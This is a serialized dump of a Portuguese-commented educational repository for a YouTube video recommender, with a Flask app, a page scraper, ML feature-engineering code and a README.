receber.\napp = Flask(__name__)\n\n\n# Pode-se escolher um banco de dados mais sofisticados como SQlite ou seila, mas nesse caso pra deixar as coisas simples e claras, vamos usar um arquivo como banco de dados, como nao e o caso de precisar de senha, nao sao dados sigiliosos e tal, a gente pode colocar tudo num arquivo que nao da nada, é um prototipo, um arquivo bem simples.\n\n# Primeiro crio uma lista pra ele armazena os videos novos com as previsões.\n\n# crio esse arquivo \"novos_videos.json\", entao coloco: se não existir, se o arquivo que eu passei aqui nessa variavel nao existir, ele vai rodar uma função update.db que vai estar no run_backend e vai puxar esses videos pra gente e colocar nesse arquivo.\n\n# abrindo o arquivo \"novos_videos.json\", ele vai ter um json por linha e em cada um, o titulo, score(previsão do ensemble), e o video id que é o link para o video. E o uptade time, que é o horario que pegamos o video la do YT. Lista simples de varios json's.\n\n# Para pegar o last_update, usamos a função getmtime, que pega o momento em que o arquivo foi modificado pela ultima vez, e ele vai retornar isso em segundos desde 01-01-1970, e mario multiplica por 1e9, pq ele usa a unidade em nano segundos, ja que ele nos retorna em unidade de segundos, nao e necessario mas mario prefere usar em nano segundo.\n\n# depois tem um 'if': se o momento atual, quando alguem fez a requisição dessa pagina menos(-) for maior que 720 horas, ele vai falar: se faz mais de um mês, FAÇA A ATUALIZAÇÃO DO BANCO DE DADOS. Que é através do update_db. \n\n# PQ UM MÊS ? Nem toda semana ou mês vao ter videos interessantes, entao e desnecessario atualizar com uma frequencia maior. Poderia ser até mais que um mês, mas vamos deixar assim.\n\n# Na parte do 'with open' ja temos o arquivo salvo no disco do servidor, agora vamos ler esse arquivo, pegar cada json e colocar naquela lista videos criada no inicio da função.\n\n# Agora vamos iterar pela lista de videos e criar outra lista, a de previsões. Pq isso? Pq eu nao quero que ele me mostre todos os videos, ficaria uma pagina muito grande. Vou usar a função sorted pra ele poder rankear do video mais interessante pro menos interessante e so retornar pra mim os 30 mais interessantes. \ndef get_predictions():\n\n videos = []\n \n novos_videos_json = \"novos_videos.json\"\n if not os.path.exists(novos_videos_json):\n run_backend.update_db()\n \n last_update = os.path.getmtime(novos_videos_json) * 1e9\n\n #if time.time_ns() - last_update > (720*3600*1e9): # aprox. 1 mes\n # run_backend.update_db()\n\n with open(\"novos_videos.json\", 'r') as data_file:\n for line in data_file:\n line_json = json.loads(line)\n videos.append(line_json)\n\n predictions = []\n for video in videos:\n # depois que cria a lista de tuples\n predictions.append((video['video_id'], video['title'], float(video['score'])))\n # aplico a função sorted, usar a função no key, vai pegar o ultimo elemento(score) e vai ordenar de trás pra frente, do maior pro menor essa lista, e vou pegar o 30 primeiros\n predictions = sorted(predictions, key=lambda x: x[2], reverse=True)[:30]\n\n # agora vou iterar, so que ppr essa lista. E nessa lista vou colcoar o código HTML pra cada um dos videos que estão nessa lista de predictions, temos um HTML muito simples que criar uma tag com hiperlink pra cada video, e coloca nessas th e tr que são as tags pra organizar a tabela, e coloca a score tbm. Isso é o codigo de cada um dos videos que temos na pagina do app. \n predictions_formatted = []\n for e in predictions:\n #print(e)\n predictions_formatted.append(\"<tr><th><a href=\\\"{link}\\\">{title}</a></th><th>{score}</th></tr>\".format(title=e[1], link=e[0], score=e[2]))\n \n # no fim eu preciso dar um 'join' nessa lista e colocar uma linha, eu coloco cada item dessa lista numa nova linha pra ele formatar corretamente a tabela. É possivel ver isso mais claro no codigo fonte da pagina do app.\n # Daqui o get_prediction vai pro main_page e o resto ta explicado la.\n return '\\n'.join(predictions_formatted), last_update\n\n\n\n# Pra indicar pro flask pra onde ele tem que indicar uma requisição, temos que usar o 'decorator' do python, nao precisa entender mas é uma função que colocamos com \"@\", ela vai pegar a função abaixo, no caso main_page, e vai aceita-la como argumento pra poder fazer alguns processos internos. Dentro do parenteses temos que colocar qual vai ser a requisição que vai chamar essa função \"('/')\", então o que estamos falando é: quando fizerem a requisição pra '/', pro diretorio raiz do nosso dominio, aplicação, retornamos o resultado dessa função. Quando acessarmos o endereço passado do heroku onde o app está hospedado, vamos receber o resultado dessa função.\n\n# Essa função faz basicamente duas coisa: ela vai rodar a função get_predictions e vai receber as previsões relativamente formatas e o momento em que foi rodado o 'last_update', o momento em que ele buscou pela ultima vez os videos no YT. Pq? Pq precisamos ir la no YT buscar os videos novos que foram postados pra gente fazer as previsões e eu quero guardar esse las_update pra guardar aqui na pagina quando retornar.\[email protected]('/')\n# Ao rodar essa função ele está retornando uma string com código HTML e um cabeçallho com \"Recomendador de Vídeos do Youtube\", e ai no corpo ele coloca os segundos desde a ultima atualização, através do last_update. E na tabela ele vai colocar o pred que é uma string muuuito grande, onde ele coloca cada video dentro de uma tabela pra ficar razoalvemente formatada. Coloca o titulo, o score que o modelo de ensemble deu pra esse video, e tambem o link que nos leva para o video. \ndef main_page():\n preds, last_update = get_predictions()\n return \"\"\"<head><h1>Recomendador de Vídeos do Youtube</h1></head>\n <body>\n Segundos desde a última atualização: {}\n <table>\n {}\n </table>\n </body>\"\"\".format((time.time_ns() - last_update) / 1e9, preds)\n\n# pro flask rodar precisamos colcoar isso \"if __name__ == '__main__':\" que é coisa comum do python pra rodar scripts, e em geral para apps de produção nao se coloca debug=True se nao vai ficar debugando ele. E o host que é o ip dentro da maquina onde vai rodar essa aplicação.\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')" }, { "alpha_fraction": 0.6871165633201599, "alphanum_fraction": 0.7177914381027222, "avg_line_length": 37.35293960571289, "blob_id": "dd45c7fb8b980d000fec35e29730e7cea227049e", "content_id": "b497946604ff3363a1ca5277318f49dc9a673ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 662, "license_type": "no_license", "max_line_length": 118, "num_lines": 17, "path": "/README.md", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <img src=\"jarbasjr.jpeg\" >\n</p>\n\n# Jarbas Carriconde\n<sub>*Data Science & Machine Learning - Engenheiro de Automação pela Univerisdade Federal do Rio Grande - FURG*</sub>\n\n**[LinkedIn](https://www.linkedin.com/in/jarbas-carriconde-4877b9151/)**\n\nSeguem as pastas com os notebooks comentados, sobre todas as etapas de um projeto que **Recomenda Vídeos no Youtube**,\ndesde as hipóteses de negócios até a etapa de colocar em produção:\n\n\n* **1.Definindo o problema**: https://bit.ly/2YVKMR9\n* **2.Preparando os Dados**: https://bit.ly/37MuSN5\n* **3.Criando o Modelo**: https://bit.ly/3elr9bC\n* **4.Colocando em produção**: https://bit.ly/2NhQSWv\n" }, { "alpha_fraction": 0.6697960495948792, "alphanum_fraction": 0.6727096438407898, "avg_line_length": 35.35293960571289, "blob_id": "7fc91651276e8997158b40d77aad1c9ed4334fe9", "content_id": "53785bac99aa3117f22f78789c0d231c691ec497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3109, "license_type": "no_license", "max_line_length": 392, "num_lines": 85, "path": "/4. Colocando em produção/get_data.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "import requests as rq\nimport bs4 as bs4\nimport re\nimport time\n\n\n# Esse simplesmente pegar e retorna o código fonte da pagina, response.text que a gente passa para o beatiful soup, o bs4.\n\ndef download_search_page(query, page):\n url = \"https://www.youtube.com/results?search_query={query}&sp=CAI%253D&p={page}\"\n urll = url.format(query=query, page=page)\n #print(urll)\n response = rq.get(urll)\n \n return response.text\n\n\n# faz a mesma coisa, só que com a pagina do video, exatamente como lá no notebook de coleta.\n\ndef download_video_page(link):\n url = \"https://www.youtube.com{link}\"\n urll = url.format(link=link)\n response = rq.get(urll)\n \n link_name = re.search(\"v=(.*)\", link).group(1)\n\n return response.text\n\n# Mesma coisa dos primeiros notebooks de coletas, a gente vai pegar o beatifulsoup, pegar as tags. Se tiver duvida retornar la nos notebooks de coleta. Só que ao invés de guardar no arquivo parsed_videos.json, vamos pegar os dados e adicionar em video_list pq vamos retornar essa lista la pro run_backend. Essa video_list é resultado dessa função que pega os links dos videos.\n\ndef parse_search_page(page_html):\n parsed = bs4.BeautifulSoup(page_html)\n\n tags = parsed.findAll(\"a\")\n\n video_list = []\n\n for e in tags:\n if e.has_attr(\"aria-describedby\"):\n link = e['href']\n title = e['title']\n data = {\"link\": link, \"title\": title}\n video_list.append(data)\n return video_list\n\n\n# Esse é o mais complicadinho, se tiver dúvida voltar la nos primeiros notebooks de coleta. Ao invés de salvar no arquivo a gente retorna o proprio dicionarios que criamos com todas as informações. Mandamos todos os dados mesmo, de forma bem bruta, mesmo que nao utilizemos todos, pq depois se for necessario novos testes e criação de features, nao precisarmos vir aqui de novo e mudar tudo. \n\ndef parse_video_page(page_html):\n parsed = bs4.BeautifulSoup(page_html, 'html.parser')\n\n class_watch = parsed.find_all(attrs={\"class\":re.compile(r\"watch\")})\n id_watch = parsed.find_all(attrs={\"id\":re.compile(r\"watch\")})\n channel = parsed.find_all(\"a\", attrs={\"href\":re.compile(r\"channel\")})\n meta = parsed.find_all(\"meta\")\n\n data = dict()\n\n for e in class_watch:\n colname = \"_\".join(e['class'])\n if \"clearfix\" in colname:\n continue\n data[colname] = e.text.strip()\n\n for e in id_watch:\n colname = e['id']\n #if colname in output:\n # print(colname)\n data[colname] = e.text.strip()\n\n for e in meta:\n colname = e.get('property')\n if colname is not None:\n data[colname] = e['content']\n\n for link_num, e in enumerate(channel):\n data[\"channel_link_{}\".format(link_num)] = e['href']\n\n\n return data\n\n\n\n\n# Não tem muito segredo colocar em produção essa parte de processamento de dados, e pegar o codigo que utilizamos pra puxar os codigos que usamos pra coletar/puxar os dados originalmente de algum banco de dados e transformar em funções que possamos usar pra rodar um exemplo de cada vez." }, { "alpha_fraction": 0.7220183610916138, "alphanum_fraction": 0.7280734181404114, "avg_line_length": 74.64583587646484, "blob_id": "1a98b535a98fa4654cfaa8d100ba2658293218af", "content_id": "0f10335a273a390f3fc9aa0fbdd1af1c7e3567d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11039, "license_type": "no_license", "max_line_length": 929, "num_lines": 144, "path": "/4. Colocando em produção/ml_utils.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport re\nimport joblib as jb\nfrom scipy.sparse import hstack, csr_matrix\nimport numpy as np\nimport json\n\n# Aqui vamos ver muita coisa que também não será novidade.\n\n# processar as datas da mesma maneira que fizemos na coleta de dados\nmapa_meses = {\"jan\": \"Jan\",\n \"fev\": \"Feb\",\n \"mar\": \"Mar\", \n \"abr\": \"Apr\", \n \"mai\": \"May\", \n \"jun\": \"Jun\",\n \"jul\": \"Jul\",\n \"ago\": \"Aug\", \n \"set\": \"Sep\", \n \"out\": \"Oct\", \n \"nov\": \"Nov\",\n \"dez\": \"Dec\"}\n\n\n# aqui temos uma diferença, aqui carregamos os modelos, no formato pkl.z, seria a mesma coisa que estivessemos treinando e fazendo as previsões do modelo aqui. Geralmente a gente ta acostumado nos cursos e no kaggle, que ta tudo em um notebook só: treinamento e previsão. Nesse caso a gente ta pegando como se a gente tivesse parado na parte de treinamento e agora a gente pode usar isso pra fazer a previsão. Carregando isso aqui estamos carregando o objeto do modelo exatamente como estava na hora que salvamos. POr isso e importante saber as versões de bibliotecas que estamos usando pra informar pro app pra nao ter problemas de compatibilidades, vamos ver isso em breve. \n# Criamos propositalmente fora de todas as funções pra que eles possam ser acessados por qualquer função necessaria, apesar que a gente so vai usa-los em uma função e poderiam ser carregados na função especifica. Outra vantagem é que eles ja ficam na memoria, entao se for um modelo muito pesado de carregar, so precisamos carregar uma vez. \nmdl_rf = jb.load(\"random_forest_20200208.pkl.z\")\nmdl_lgbm = jb.load(\"lgbm_20200208.pkl.z\")\ntitle_vec = jb.load(\"title_vectorizer_20200208.pkl.z\")\n\n\n\n# clean_date, mesma limpeza que fizemos, so que agora precisamos mudar algumas coisas pq nao temos o pandas. Emtão pra facilitar bastante a nossa vida, criamos as funções recebendo o dicionario inteiro de dados, com as informações e so pegando aquilo que é necessario pra fazer essa função. \n\n# Aqui vamos usar a biblioteca de expressões regulares do python pra achar a mesma expressão regular que usamos com a função do pandas la na hora de limpar pra fazer o modelo, se não achar nada, ele retorna NaN. Se deu NaN e nao achou data, isso é um sinal que há problema com essa pagina, logo a gente nao deve fazer previsão pra essa pagina pois nao tem as info necessarias.\n\ndef clean_date(data):\n if re.search(r\"(\\d+) de ([a-z]+)\\. de (\\d+)\", data['watch-time-text']) is None:\n return None\n \n # Aqui, quando rodamos raw_date_str_list, ele retorna os grupos de captura da expressão regular, no caso dia, mês e ano. \n raw_date_str_list = list(re.search(r\"(\\d+) de ([a-z]+)\\. de (\\d+)\", data['watch-time-text']).groups())\n #print(raw_date_str_list)\n # E aqui vamos ver que: devemos lembrar que no momento da modelagem deviamos adicionar um '0' na frente de numeros do dia que tivessem um digito, pra que o pandas entedesse que era uma data pro pandas formatar e trasnformar em um objeto data. Aqui estamos fazendo a mesma coisa, se o primeiro elemento que é o dia tiver tamanho 1, adiciona um 0 na frete.\n if len(raw_date_str_list[0]) == 1:\n raw_date_str_list[0] = \"0\"+raw_date_str_list[0]\n\n # Mesma coisa na hora de processar os meses, to pegando o elemento 1, que se refere aos meses: 0 é dia, 1 é mês e 2 é ano. E entao aplicamos o mapa meses, vai estar a abreviação de meses em portugues, e aplicamos o mapa para trocar para como o pandas espera o mês.\n raw_date_str_list[1] = mapa_meses[raw_date_str_list[1]]\n \n # Precisamos transformar tudo isso em uma string pra passar pra função to_datetime, e juntamos os elementos por espaço. E transformamos tudo em uma string.\n clean_date_str = \" \".join(raw_date_str_list)\n\n # e ele retorna o o objeto datetime, para que possamos manipular.\n return pd.to_datetime(clean_date_str, format=\"%d %b %Y\")\n\n\n\n# Agora vamos limpar o campo de visualizações, novamente estamos usando a biblioteca de expressão regular do python pra achar o numero que queremos nesse campo 'watch-view-count', se for NaN, é nesse caso queremos retornar que tem 0 visualização o video. \ndef clean_views(data):\n raw_views_str = re.match(r\"(\\d+\\.?\\d*)\", data['watch-view-count'])\n if raw_views_str is None:\n return 0\n # Aqui no raw_views_str, to pegando o group 1, que é o group de captura, se pegar o group 0, ele pega a expressão inteira, que da na mesma, mas em geral não da na mesma. E fazemos o replace do '.' por nada, pq o python precisa entender que esses numeros estão na casa de milhares, mas esse ponto seria como uma virgula.\n raw_views_str = raw_views_str.group(1).replace(\".\", \"\")\n #print(raw_views_str)\n\n # e então retorna os valores 'int' de visualizações.\n return int(raw_views_str)\n\n\n# FUNÇÃO IMPORTANTE, novamente, mario fez o maximo possivel pra pegar o dicionario inteiro e definindo dentro da função o que vamos usar.\ndef compute_features(data):\n \n # Se não tem esse campo, significa que deu algum problema.\n if 'watch-view-count' not in data:\n return None\n \n # pegamos a data da publicação e fazemos o 'clean_date', processo mostrado na função acima. Se não achar esse campo ele retorna none, e vai pular esse exemplo, nao vamos fazer previsão pq nao temos informação necessaria. \n publish_date = clean_date(data)\n if publish_date is None:\n return None\n\n # views vai ser o numero inteiro de visualizações que vamos retornar com a função clean views, seja ele 0 ou maior que 0.\n views = clean_views(data)\n \n # O titulo vai ser watch-title.\n title = data['watch-title']\n \n # mario gosta de criar features como dicionario, pq posso, mesmo aqui podemos acessa-las pelo nome, e fica mais facil de ordenar, nao cometer erros bobos, como inverter a ordem das features.\n features = dict()\n \n # mesma coisa que fizemos nos notebooks de modelos, a diferença é que vamos pegar o dia de hoje menos a data de publicação. Não podemos colocar a data fixa que colocamos na modelagem, mas precisamos de numero positivos pq o modelo desconhece numero negativo, se colocarmos a mesma data de lá, ele vai ter numero negativos, pq ele foi publicado depois da data fixa e o modelo nao saberá o que fazer com eles. Esse é uma das questões que em produção muda um pouco como computamos a feature. E temos que ver se o modelo sobrevive a isso, nesse caso vai pq nao estamos usando diretamente essa feature, mas como uma medida de popularidade na hora de fazer a feature de views por dia, onde deve-se dividir as views pela quantidade de dias que está publicado. Tanto que deleto o tempo desde a publicação desse dicionario. Então até aqui computamos duas features numericas, views e views por dia. Essa função é aplicada a cada video.\n features['tempo_desde_pub'] = (pd.Timestamp.today() - publish_date) / np.timedelta64(1, 'D')\n features['views'] = views\n features['views_por_dia'] = features['views'] / features['tempo_desde_pub']\n del features['tempo_desde_pub']\n\n # hora de transformar o titulo em vetor, pegar o title_vec que é o vetorizaror tf-idf e passar uma lista com essa string do titulo. Se passar só a string ele nao vai entender, entao precisamos passar pra função uma lista contendo o elemento que é o titulo, titulo no caso só a string do nome do video. \n vectorized_title = title_vec.transform([title])\n\n # ele retorna pra gente uma matriz csr, é um tipo de matriz esparsa. \n #E estamos transformando em csr matrix uma array do numpy que contém os dois elementos de features, essas precisam ser as duas primeiras pois era assim quando treinamos na modelagem.\n num_features = csr_matrix(np.array([features['views'], features['views_por_dia']]))\n # agora usamos aquela função do scipy pra juntar as features numericas com a matriz de contagem de palavras do titulo.\n feature_array = hstack([num_features, vectorized_title])\n\n # e retornamos essa feature_array, é uma array gigante de 1 x numero de colunas, mesma coisa que pegar uma linha da matriz que usamos pra treinar ou validar o modelo. Não tem segredo passar informações novas pro modelo. A parte mais chata é computar, processar, limpar todas as informações para colocar no formato de feature que precisamos. \n return feature_array\n\n\n# Essa função usamos la em run_backend, ela vai chamar o compute_features com o 'data', aquele dicionario gigante de informações, ele retorna a 'feature_array' que vimos acima. Se a feature_array, for NaN, ele vai retornar 0 : não tem previsão pra esse video.\ndef compute_prediction(data):\n feature_array = compute_features(data)\n\n if feature_array is None:\n return 0\n\n # retorna probabilidade do video ser bom ou ruim. E passamos feature_array, passamos uma matriz esparsa de 1 pelo numero de colunas, e ele retorna uma array bidimensional, então selecionamos a linha 0 e o elemento 1, que é a probabilidade de ser da classa positiva. Quando usamos funções que seguem a API do sckit-learn, ele vai retornar a probabilidade de ser classe 0 e a proba de ser da classe 1 , por isso que tem esse [0] e [1] no final. \n p_rf = mdl_rf.predict_proba(feature_array)[0][1]\n p_lgbm = mdl_lgbm.predict_proba(feature_array)[0][1]\n\n # ensemble dos dois modelos, random forest e lgbm. \n p = 0.5*p_rf + 0.5*p_lgbm\n \n # essa log_data serviria pra gente fazer monitoramento do modelo em produção, precisamos sempre monitorar pra ver se ele ta recebendo os valores corretos e tal. COmo isso é um protótipo, nao teremos essa parte de monitoramento.\n # Mas o que eu salvo nesse 'log_data' ? salvo os dados originais, feature_array e a previsão. IR PRA FUNÇÃO 'log_data' ABAIXO PRA VER.\n \n #log_data(data, feature_array, p)\n\n return p\n\ndef log_data(data, feature_array, p):\n# vamos aumentar o dicionario 'data', vamos colocar um campo com a previsão e outro com a feature_array, para que possamos ver se por alguma incompatibilidade o meu modelo começar a computar as features erradas, apesar das informações originais estarem corretas, vamos poder olhar essa 'feature_array' e ver um baita vetor onde vamos saber que ta acontecendo alguma coisa errada, conseguir detectar em que ponto que ele começou a prever errado. Armazendo como uma lista pra nao dar conflitos quando transforma pra json.\n\n# e a previsão tbm, pra ver historicamente se o modelo esta tendo 'auc' e 'ap' que esperamos, se as previsões estão no intervalo que eu espero. MAS NÃO VAMOS USAR AQUI.\n\n #print(data)\n video_id = data.get('og:video:url', '')\n data['prediction'] = p\n data['feature_array'] = feature_array.todense().tolist()\n \n # aqui a ideia era que armazenar ou em um arquivo ou banco de dados, e que cada chave video_id teria os dados relacionados a ele, que coletamos sobre ele. \n #print(video_id, json.dumps(data))\n\n\n\n\n\n\n\n" } ]
7
DRoss56/MyFirstRepo
https://github.com/DRoss56/MyFirstRepo
7104b9d8afe998e878f53752e07548576ca5b604
09c504d577f37232d2836cccf7edcca1fcba4829
5e608830f46a12757a2a9dda2b622356332659e6
refs/heads/master
2021-05-07T00:26:38.901910
2018-05-14T15:53:34
2018-05-14T15:53:34
110,143,206
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6014235019683838, "alphanum_fraction": 0.6014235019683838, "avg_line_length": 18.071428298950195, "blob_id": "d8523f67a469a0d2c11d36955f5f59f8f4d50337", "content_id": "6ed643d92404c6ee19d2cc05a54d4f25d7e8d72a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/Personality_PAPA.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "name = \" Dashiell\"\r\nstate = \"Texas\"\r\ntvshow = \" The Office\"\r\n\r\nprint (name + \" likes to watch\" + tvshow)\r\n\r\n\r\nprint (\"Whats your favorite subject?\")\r\nsubject = input()\r\n\r\nif subject == \"History\":\r\n print (\"Thats right\")\r\nelse:\r\n print (subject + \"is the wrong subject\")\r\n" }, { "alpha_fraction": 0.5616180896759033, "alphanum_fraction": 0.5738475918769836, "avg_line_length": 24.575000762939453, "blob_id": "d3b320f24919c14ded0417eeba56312153db4c43", "content_id": "eb479834950ddbb7d13b3d4a0a2e81b9c9c241dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1063, "license_type": "no_license", "max_line_length": 134, "num_lines": 40, "path": "/guesswordDR.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import random\r\n\r\nwords = [\"intricate\",\"i cup\",\"innovitation\",\"vsauce\"]\r\n\r\nhint1 = [\"The best word\",\"if apple made a cup\",\"the future, what drives the world\",\"hey ______ Michael here\"]\r\n\r\nhint2 = [\"I always love to say it \",\"what you see with and what you drink out of\",\"flows like a river\",\"A great source of spit facts\"]\r\n\r\nnumber = random.randint(0,3)\r\n\r\nsecretword = words[number]\r\n\r\nguess = \"\"\r\n\r\ncounter = 0\r\n\r\nwhile True:\r\n print(\"Guess the best word\")\r\n print(\"Type 'hint1', 'hint2', 'firstletter', 'lastletter', or 'give up' for help.\")\r\n guess = input()\r\n counter += 1\r\n if guess == secretword:\r\n print (\"You are correct? It took you \" + str(counter) + \" guesses.\")\r\n break\r\n\r\n elif guess == \"hint1\":\r\n print( hint1[number] )\r\n\r\n\r\n print( hint2[number] )\r\n\r\n elif guess == \"first letter\":\r\n print ( secretword[0] )\r\n\r\n elif guess == \"last letter\":\r\n print ( secretword[-1] )\r\n\r\n elif guess == \"give up\":\r\n print (\"One of the best words is \" + secretword )\r\n break\r\n" }, { "alpha_fraction": 0.5505449175834656, "alphanum_fraction": 0.6309658288955688, "avg_line_length": 19.81147575378418, "blob_id": "69664aff0593d29b28d34d4ba1f99dfb4376439e", "content_id": "3b2e59b5796abe73a66e6fda297d2f3136632391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2661, "license_type": "no_license", "max_line_length": 348, "num_lines": 122, "path": "/PG quiz Dash Ross.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import pyautogui as pg\r\nimport time\r\nimport webbrowser\r\npoints = 0\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nHow do you spend most saterdays?\r\n\r\na)With the boys\r\nb)Doing mathematics\r\nc)Gaming\r\nd)Sports\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=1\r\nelif answer == \"b\":\r\n points +=2\r\nelif answer == \"d\":\r\n points +=3\r\nelif answer == \"c\":\r\n points +=4\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nIn which situation is it okay to cry?\r\n\r\na)When you are sad\r\nb)At the Grand Canyon\r\nc)When you are shot\r\nd)None of the above\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=1\r\nelif answer == \"d\":\r\n points +=2\r\nelif answer == \"c\":\r\n points +=3\r\n\r\n\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nHow many Fortnight wins do you have?\r\n\r\na)0\r\nb)1\r\nc)2\r\nd)3+\r\n\r\n\r\n\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=3\r\nelif answer == \"d\":\r\n points +=1\r\nelif answer == \"c\":\r\n points +=2\r\n\r\n\r\n#Question\r\nanswer = pg.prompt(\r\n\"\"\"\r\nWhat role do you play in the social heirarchy?\r\n\r\na)Nerd\r\nb)Jock\r\nc)Dominant Male\r\nd)Scholar\r\n\"\"\"\r\n )\r\n\r\n#Give points\r\nif answer == \"a\":\r\n points +=4\r\nelif answer == \"b\":\r\n points +=2\r\nelif answer == \"d\":\r\n points +=3\r\nelif answer == \"c\":\r\n points +=1\r\n\r\n\r\n# END OF SURVEY\r\n\r\npg.alert(\"Wow \")\r\n\r\n# it must be Dashiell because you are a cool cat\r\nif points <= 4:\r\n pg.alert(\"it must be Dashiell because you are a cool cat\")\r\n webbrowser.open(\"https://www.google.com/search?rlz=1C1GCEA_enUS752US752&biw=1366&bih=637&tbm=isch&sa=1&ei=XE9vWqGYCJKR_QbPp5rYDg&q=cool+club+penguin&oq=cool+club+penguin&gs_l=psy-ab.3..0l4j0i30k1j0i8i30k1j0i24k1l2.27862.30678.0.31043.17.17.0.0.0.0.88.966.17.17.0....0...1c.1.64.psy-ab..0.17.962...0i67k1.0.NuTVNZcmZ_g#imgrc=g5nLA4zZ8AI1QM:\")\r\n# Somewhat cool\r\nif points <= 8 and points > 4:\r\n pg.alert(\"You are pretty cool, not quite a cool cat\")\r\n webbrowser.open (\"https://www.youtube.com/watch?v=TcWPiHjIExA\")\r\n# Not cool\r\nif points > 8 and points < 12:\r\n pg.alert(\"Sorry but you just dont have the cool factor to you, try to take your cool pills daily\")\r\n webbrowser.open (\"https://www.youtube.com/watch?v=TcWPiHjIExA\")\r\n# Nerd\r\nif points > 12:\r\n pg.alert(\"You aren't cool at all you nerdface jk just take more cool pills\")\r\n webbrowser.open (\"https://www.google.com/search?rlz=1C1GCEA_enUS752US752&biw=1366&bih=637&tbm=isch&sa=1&ei=0E9vWs-9E4-zggeXzq_4CA&q=h3+h3+cool&oq=h3+h3+cool&gs_l=psy-ab.3...12944.18738.0.19010.19.13.4.2.4.0.78.692.13.13.0....0...1c.1.64.psy-ab..0.17.605...0j0i67k1j0i10k1j0i13k1j0i13i30k1.0.YvatKkwjCjU#imgrc=DdiTPoO3lB6ITM:\")\r\n" }, { "alpha_fraction": 0.55078125, "alphanum_fraction": 0.568359375, "avg_line_length": 15.066666603088379, "blob_id": "e74c262a00e86c554156957960a6399073326ef8", "content_id": "9ea787b5f1f414ad8f4a1482ac84a2f2344c82a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 141, "num_lines": 30, "path": "/MadLIBS.py", "repo_name": "DRoss56/MyFirstRepo", "src_encoding": "UTF-8", "text": "import time\r\n\r\nprint (\"Write a person\")\r\nname1 = input()\r\n\r\nprint(\"Write an action verb\")\r\naction = input()\r\n\r\nprint(\"Write a noun\")\r\nnoun = input()\r\n\r\nprint(\"Write an adjective\")\r\nadj = input()\r\n\r\nprint(\"Write a kind of body part\")\r\nbodypart1 = input()\r\n\r\nprint(\"Write a feeling\")\r\ninjury1 = input()\r\n\r\n\r\nanswer = input ()\r\n\r\n\r\n### MAD LIB ###\r\n\r\nprint (\"Whenever \" + name1 + \" \"+ action + \" at \" + noun + \" \" + \"They get \" + \" \" + adj + \" \" + bodypart1 + \" Which makes them \" + injury1)\r\n\r\n\r\ntime.sleep(100)\r\n" } ]
4
mwickram/LC101_Web_Caesar
https://github.com/mwickram/LC101_Web_Caesar
62bc5432ee88807642d4c22616a0c35bb73dacd8
27e25ffb9792ce75b926f3ebdaad5b1b7978c45f
0c74aa03e16b698a4dd9a57e01d318d9235af17c
refs/heads/master
2021-01-22T04:49:43.687924
2017-02-10T17:27:02
2017-02-10T17:27:02
81,588,774
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6353383660316467, "alphanum_fraction": 0.640350878238678, "avg_line_length": 24.774192810058594, "blob_id": "f28ec98960a57395975f23f2a4de49e45d8abc4e", "content_id": "05d4f8c370107c34d21a557e2b37bc1f00149a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/caesar.py", "repo_name": "mwickram/LC101_Web_Caesar", "src_encoding": "UTF-8", "text": "import string\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\ndef alphabet_position(letter):\n index = alphabet.find(letter.lower())\n return index\n\ndef rotate_character(char, rot):\n encrypted=\"\"\n rot = int(rot)\n if char==chr(32):\n encrypted=chr(32)\n elif char in string.digits:\n encrypted=char\n elif char in string.punctuation:\n encrypted=char\n else:\n index = alphabet_position(char.lower()) + rot\n if index >= len(alphabet):\n index=index%len(alphabet)\n encrypted = alphabet[index]\n if char in string.ascii_uppercase:\n encrypted=encrypted.upper()\n return encrypted\n\ndef encrypt(text,rot):\n encrypted=\"\"\n for char in text:\n encrypted = encrypted + rotate_character(char,rot)\n return encrypted" } ]
1
aslanamanzholov/alghoritms_detail
https://github.com/aslanamanzholov/alghoritms_detail
187fcee03ac97947a41181ca3764ccb281ffa6f4
1f2c93d5a6d69d0c9838eac9c457002452839921
10e2c3d798a853e45754c1f2547b64d0973272af
refs/heads/master
2023-08-20T16:12:23.373888
2021-09-24T10:59:14
2021-09-24T10:59:14
286,681,827
0
0
null
null
null
null
null
